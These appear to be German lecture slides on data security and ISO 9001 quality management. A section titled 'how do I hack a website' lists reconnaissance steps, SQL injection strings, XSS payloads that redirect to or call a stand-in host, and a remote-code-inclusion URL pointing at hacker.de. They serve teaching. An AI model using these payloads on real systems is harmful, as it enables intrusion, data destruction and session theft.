Data Security - johner.org: Home

Stunde12-Testen.ink
Data Security
Security versus Safety:
-Safety: Sicherheit für Anwender, Betroffene (niemand kommt zu schaden)
-Data Security
> Vertraulichkeit der Daten
> Nachvollziehbarkeit von Änderungen (Traceability, Revisionsicherheit,
Accountability) (Wer hat wann was mit welchen Daten zu welchem Zweck gemacht?)
> Audit trail
> Prüfsummen, CRC Checks
> Sicherheit gegen Verlust und versehentliches Löschen
Gesetze
- Bundesdatenschutzgesetze
- SGB
- TDG, TKG
- StGB
Was sind Motivationen gegen den Datenschutz zu verstoßen?
- Wettbewerbsvorteil
- Sabotage
- Erpressung
1
Stunde12-Testen.ink
Wie gehe ich vor, um eine Webseite/einen Webshop zu hacken?
1. Informationen über System sammeln
- Provozieren von Fehlern
> CMS
> PHP Version
> Datenbank
> Betriebssystem
- Analysieren des HTML Codes
> Meta-tags
> Informationen/Kommentare der Entwickler
> Parameterübergabe, Verzeichnisstrukturen, HTTP Methode
> JS-Dateien
- "Sniffen" der HTTP Header
> Webserver, Applikationserver
> PHP Version
> Betriebssystem Information)
- Analysieren von URLs
Mit diesen Informationen nach bekannten Exploits suchen
http://www.cipher.org/uk/index.php
2
Stunde12-Testen.ink
2. SQL Injection
In Eingabemasken
Beispiel Webseite mit Benutzername und Passwort
SELECT * FROM users WHERE (username=' ' OR 1=1;--' and password = 'YY');
SELECT * FROM products WHERE name like '%ZZ%';
ZZ ersetzen durch 'SHUTDOWN;-Häufige Missbräuche
- Löschen DB
- Anlegen von Benutzern
- Ändern von Preisen
3. Cross Site Scripting XSS
Persistentes XSS (Code landet in Datenbank), z.B. in Formularfeldern
<script>alert('Das hätten Sie nicht sehen sollen')</script>
<script>location="http://xy.de/coolerBefehl"</script>
<img src="http://xy.de/coolerBefehl" height="1"/>
Spezialfall: Session hijacking
3
Stunde12-Testen.ink
4. Direkter Aufruf von URLs
Erraten von URLs (Datum, ...
5. Remote Code Execution
Aufruf einer URL wie /plugin.php?phpbb_root_path=http://hacker.de
Weiterführende Informationen
http://johnny.ihackstuff.com (Finden von Zugangsdaten mit Google)
Zeitschrift: Hacking
www.hakin9.org
Tutorial (Cisco?): Suchen nach "HackMeBooks"
4
Stunde12-Testen.ink
ISO 9001:2000
- ist eine Norm für ein Qualitätsmanagementsystem
- ist unabhängig von der Branche
- ist international anerkannt
- Definiert 4 Prozesse (siehe nächste Seite)
Prozess
Vorgehensmodell mit dem Ziel ein (für den Kunden nützliches) Produkt zu erstellen
Festgelegte Abläufe und Verantwortlichkeiten
Beispiele:
- Entwicklungsprozess
- Fertigungsherstellungsprozess
- Qualitätssicherungsprozess
5
Stunde12-Testen.ink
Prozesse der ISO 9001
Absatz
- Verkaufszahle
- Downloadzahlen
- Torrents
Beschwerden
Anfragen
Testberichte
6
Stunde12-Testen.ink
7
Stunde12-Testen.ink
Beispiel (Kapitel 7.3.3)
The outputs of design and development shall be provided in a form that
enables verification against the design and development input and shall be
approved prior to release.
Design and development outputs shall
a) meet the input requirements for design and development,
b) provide appropriate information for purchasing, production and for service
provision,
c) contain or reference product acceptance criteria, and
d) specify the characteristics of the product that are essential for its safe
and proper use.
Diese Forderungen sind spezifisch für die Firma umzusetzen
8
Stunde12-Testen.ink
Von der Vision zum
Prozess (und zur Organisation)
Vision
Fähigkeiten
Wettbewerb
Beispiel (Strategie):
Bank hat Ziel ab nächstem Quartal
jeden Monat 2 neue Finanzprodukte
auf den Markt zu bringen
Strategie
Prozesse
Prozessorientierte Organisation
(um Schnittstellen zwischen Abteilungen
zu vermeiden)
Ziele
- Spezifisch
- M essbar
- Aktionsorientiert
- Realistisch
- Terminiert
Beispiel (Prozess):
1. Analysieren des Markts
2. Finanzmathematische Berechnungen
verschiedener Alternativen
3. Umsetzung der Formeln in IT-System
4. Marketing und Verkauf starten
Organisation
9